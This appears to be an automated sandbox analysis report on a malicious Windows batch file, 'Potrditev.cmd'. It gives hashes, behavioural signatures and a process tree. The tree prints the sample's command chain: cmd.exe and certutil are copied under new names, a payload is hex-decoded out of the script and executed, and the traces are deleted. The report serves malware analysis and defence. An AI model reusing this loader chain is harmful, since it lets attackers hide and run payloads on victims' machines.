Analysis
-
max time kernel
141s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
04-08-2024 18:37
Static task
static1
Behavioral task
behavioral1
Sample
Potrditev.cmd
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Potrditev.cmd
Resource
win10v2004-20240802-en
General
-
Target
Potrditev.cmd
-
Size
2.8MB
-
MD5
306e6e3743666b8f5fedb0127b041883
-
SHA1
53ac1756ee69296be5f5c99ee18b1d1cb70369d4
-
SHA256
20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
-
SHA512
233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
-
SSDEEP
24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
pid Process 2272 alpha.exe 2800 alpha.exe 2956 kn.exe 2948 alpha.exe 2420 kn.exe 2664 CLEAN.COM 1352 alpha.exe 2636 alpha.exe -
Loads dropped DLL 11 IoCs
pid Process 2248 cmd.exe 2248 cmd.exe 2800 alpha.exe 2248 cmd.exe 2948 alpha.exe 2248 cmd.exe 2248 cmd.exe 1308 WerFault.exe 1308 WerFault.exe 1308 WerFault.exe 1308 WerFault.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 1308 2664 WerFault.exe 39 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CLEAN.COM -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2664 CLEAN.COM -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2084 2248 cmd.exe 32 PID 2248 wrote to memory of 2084 2248 cmd.exe 32 PID 2248 wrote to memory of 2084 2248 cmd.exe 32 PID 2248 wrote to memory of 2272 2248 cmd.exe 33 PID 2248 wrote to memory of 2272 2248 cmd.exe 33 PID 2248 wrote to memory of 2272 2248 cmd.exe 33 PID 2272 wrote to memory of 2696 2272 alpha.exe 34 PID 2272 wrote to memory of 2696 2272 alpha.exe 34 PID 2272 wrote to memory of 2696 2272 alpha.exe 34 PID 2248 wrote to memory of 2800 2248 cmd.exe 35 PID 2248 wrote to memory of 2800 2248 cmd.exe 35 PID 2248 wrote to memory of 2800 2248 cmd.exe 35 PID 2800 wrote to memory of 2956 2800 alpha.exe 36 PID 2800 wrote to memory of 2956 2800 alpha.exe 36 PID 2800 wrote to memory of 2956 2800 alpha.exe 36 PID 2248 wrote to memory of 2948 2248 cmd.exe 37 PID 2248 wrote to memory of 2948 2248 cmd.exe 37 PID 2248 wrote to memory of 2948 2248 cmd.exe 37 PID 2948 wrote to memory of 2420 2948 alpha.exe 38 PID 2948 wrote to memory of 2420 2948 alpha.exe 38 PID 2948 wrote to memory of 2420 2948 alpha.exe 38 PID 2248 wrote to memory of 2664 2248 cmd.exe 39 PID 2248 wrote to memory of 2664 2248 cmd.exe 39 PID 2248 wrote to memory of 2664 2248 cmd.exe 39 PID 2248 wrote to memory of 2664 2248 cmd.exe 39 PID 2248 wrote to memory of 1352 2248 cmd.exe 40 PID 2248 wrote to memory of 1352 2248 cmd.exe 40 PID 2248 wrote to memory of 1352 2248 cmd.exe 40 PID 2248 wrote to memory of 2636 2248 cmd.exe 41 PID 2248 wrote to memory of 2636 2248 cmd.exe 41 PID 2248 wrote to memory of 2636 2248 cmd.exe 41 PID 2664 wrote to memory of 1308 2664 CLEAN.COM 42 PID 2664 wrote to memory of 1308 2664 CLEAN.COM 42 PID 2664 wrote to memory of 1308 2664 CLEAN.COM 42 PID 2664 wrote to memory of 1308 2664 CLEAN.COM 42
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2084
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2696
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 93⤵
- Executes dropped EXE
PID:2956
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 123⤵
- Executes dropped EXE
PID:2420
-
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 7003⤵
- Loads dropped DLL
- Program crash
PID:1308
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1352
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2636
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5523ccf257ca222401cd3915ac086f986
SHA1d9dcb0b165fbf6b5e085d7a70009f3924a7968e4
SHA256e52726ecfc11680f894efff7398e244424efffd0b8fb222a7a4c1afa7c7a20f8
SHA5121fa4acc83444c7eacfc6295bb5b24be779f986ae726a76da2cd8f0c27dfaee6c639684efa45e4515f91bdbb027025d40275a0f425344bf9fc21558807b8f544f
-
Filesize
957KB
MD5aa4820620a6d753208dbd180c8ddc87a
SHA1d687b79b4eb4359d7c310681e978c1be1ff46109
SHA256ae5740d23ffac06e5bda5dd0acfa6023df3c7951ca0c97bd3dc4b1dd22a34525
SHA5121994729cd2458ca85ca4add2ace7e1f636c941b0aef4dd1d2ecbe80324463705697387b1aaf4d7413011fef3d87415bcf0d0e3e2088e18e18c5925e06688f8a6
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2